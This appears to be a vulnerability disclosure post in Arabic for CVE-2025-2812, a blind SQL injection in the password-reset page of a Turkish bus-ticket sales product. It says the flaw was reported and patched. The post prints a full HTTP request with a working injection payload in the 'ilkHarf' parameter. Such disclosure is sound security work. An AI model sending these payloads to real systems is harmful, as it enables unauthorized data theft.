
CVE-2025-2812 حقن SQL
📌 CVE-ID: CVE-2025-2812
📢 إعلان USOM: tr-25-0099
🛡️ نوع الثغرة: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 المنتج المتأثر: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 مثال على عنوان URL المستهدف:https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
في منتج "Bilet Satış Otomasyonu"، تم اكتشاف ثغرة Boolean-based Blind SQL Injection في معامل "Adınızın ilk harfi" (ilkHarf) في صفحة إعادة تعيين كلمة المرور (SifremiUnuttum.php). تتيح هذه الثغرة تسريب بيانات من النظام دون الحاجة إلى اسم مستخدم أو كلمة مرور.
تشمل هذه الثغرة أنظمة شركات الحافلات التالية:
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
ilkHarfبعد الثغرة التي اكتشفناها في منتج "Bilet Satış Otomasyonu" الذي طورته "Mydata Bilişim Ltd. Şti"، تم الإعلان عن هذا الخلل الأمني بالرمز CVE-2025-2812 بالتنسيق مع الشركة المصنعة وUSOM. نفخر بتقديم مساهمتنا لمجتمع الأمن السيبراني خلال هذه العملية.
عقب الإبلاغ عن الثغرة، نفذت Mydata Bilişim Ltd. Şti جميع الإجراءات اللازمة بسرعة، وأغلقت الثغرة الأمنية ذات الصلة ودمجت إجراءات أمنية إضافية في أنظمتها. نشكرهم على الشفافية والتعاون والوعي بالمسؤولية التي أظهروها خلال هذه العملية.
نفخر بتقديم مساهمتنا لمجتمع الأمن السيبراني خلال هذه العملية.
يمكنك التواصل معي لأي سؤال أو ملاحظات أو تعاون: